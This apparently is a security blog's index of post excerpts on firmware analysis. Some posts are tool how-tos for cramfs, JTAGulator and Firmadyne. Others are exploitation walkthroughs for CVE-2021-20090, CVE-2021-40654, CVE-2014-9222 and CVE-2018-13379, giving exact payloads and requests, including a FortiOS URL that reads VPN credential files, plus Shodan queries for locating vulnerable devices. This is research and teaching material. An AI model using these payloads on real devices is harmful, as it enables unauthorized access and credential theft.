Posts

Extract / Create Cramfs File System from Ubuntu 20.04

Image
Extract Cramfs Check the endianness of the Cramfs file: file cramfs  This is a big endian file. Convert cramfs  file to little endian file cramfs_le using cramfsswap. cramfsswap cramfs cramfs_le Extract the little endian file  cramfs_le to folder fs using fsck.cramfs. sudo fsck.cramfs --extract=fs cramfs_le Create Cramfs Use mkfs.cramfs to create Cramfs file system from the contents of folder fs .To create a little endian file system: sudo mkfs.cramfs fs cramfs_new For big endian Cramfs file system: sudo mkfs.cramfs -N big fs cramfs_new Video

CVE-2021-20090 Arcadyan Routers Authentication Bypass Vulnerability

Image
Introduction Path traversal vulnerability in the web interface of routers with Arcadyan firmware (Buffalo, etc.) can be exploited to bypass authentication. Exploit 1. Open Burp Suite and go to Proxy > Options tab and add Match and Replace rule to remove path traversal string from Referer in request header.  Match /images/..%2f and replace it with / 2. Add another Match and Replace rule to prefix all URLs with images/..%2f .  Match GET / and replace it with GET /images/..%2f 3. Now browse the router web interface pages through Burp Suite proxy browser. All the request URLs will be automatically modified by the proxy. Some of the URLs which can be accessed without authentication: http://targetip http://targetip/info.html http://targetip/log_log.html http://targetip/lan_bridge.html http://targetip/save_init.html http://targetip/wireless_band2g.html http://targetip/ap_password_access_date_ntp.html Video

CVE-2021-40654 D-Link DIR-615 Authentication Bypass

Image
Introduction Information disclosure issue in D-LINK-DIR-615 B2 2.01mt can be exploited to gain access access to the device. Exploit 1. Open the login page of device in BurpSuite Proxy. Click on Login button and intercept the request. 2. Change HTTP Method from GET to POST 3. Change URL to /getcfg.php 4. Provide post data as SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1 followed by new line. 5. Forward the request and view the response in HTTP history tab. Find the password in response and use it to login to the device. Video

CVE-2014-9222 Misfortune Cookie Vulnerability Authentication Bypass

Image
Introduction AllegroSoft RomPager 4.34 and earlier used in certain devices has a vulnerability which can be exploited to bypass authentication using a crafted cookie. Device Identification Identify vulnerable devices using shodan query: "RomPager/4.07" "EXT:" Exploit Each firmware has a specific " number " and " offset " value which can be obtained from: https://github.com/threat9/routersploit/blob/master/routersploit/modules/exploits/routers/multi/misfortune_cookie.py For TP-Link TD-8816  router with firmware V6_100907 the number  is 107369788 and offset  is 1. To disable the authentication of this router, cookie to be sent is C107369788=A\x00. For TP-Link TD-8840T V3_110221 number and offset are 107369764 and 5, so cookie would be C107369764=AAAAA\x00. Intercept the request request sent by login page in BurpSuite Proxy and add the cookie corresponding to the firmware as given in figure below. Click on Hex tab and edit the value corresponding t...

CVE-2018-13379 Fortinet FortiOS Path Traversal/Arbitrary File Read Vulnerability

Image
Introduction Fortinet FortiOS SSL VPN web portal allows download of system files without authentication. Device Identification Identify vulnerable devices from the results of Shodan query: http.html_hash:-1454941180 Path Traversal Access sslvpn_websession file which contain credentials using URL: https://targetIP:port/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession Video

JTAGulator Firmware Upgrade from Ubuntu Linux

Image
Steps 1. Download latest stable firmware from the JTAGulator github page. At the moment, version 1.11 is the latest.  wget https://github.com/grandideastudio/jtagulator/archive/refs/tags/1.11.zip 2. Unzip downloaded zip file: unzip 1.11.zip JTAGulator.eeprom is the file required for upgrading firmware. 3. Dowload BST command line loader: wget https://www.fnarfbargle.com/bst/bstl/Latest/bstl.linux.zip 4. Unzip BST loader zip file: unzip bstl.linux.zip 5. Upgrade JTAGulator firmware: sudo ./bstl.linux -d /dev/ttyUSB0 -p 3 jtagulator-1.11/JTAGulator.eeprom Video

Firmadyne Installation & Emulation of Firmware

Image
 Introduction Firmadyne can be used to perform emulation and analysis of Linux based firmware. Installation Install Ubuntu 18.04 LTS and upgrade all packages: sudo apt update sudo apt upgrade Install and configure other packages: sudo apt-get install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmap python3-psycopg2 snmp uml-utilities util-linux vlan python3-pip python3-magic sudo update-alternatives --install /usr/bin/python python /usr/bin/python3 10 git clone --recursive https://github.com/firmadyne/firmadyne.git git clone https://github.com/ReFirmLabs/binwalk.git cd binwalk sudo ./deps.sh sudo python ./setup.py install cd .. sudo apt-get install postgresql sudo -u postgres createuser -P firmadyne Give firmadyne as password. sudo -u postgres createdb -O firmadyne firmware sudo -u postgres psql -d firmware < ./firmadyne/database/schema cd firmadyne ./download.sh sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils nano firmadyne.config ...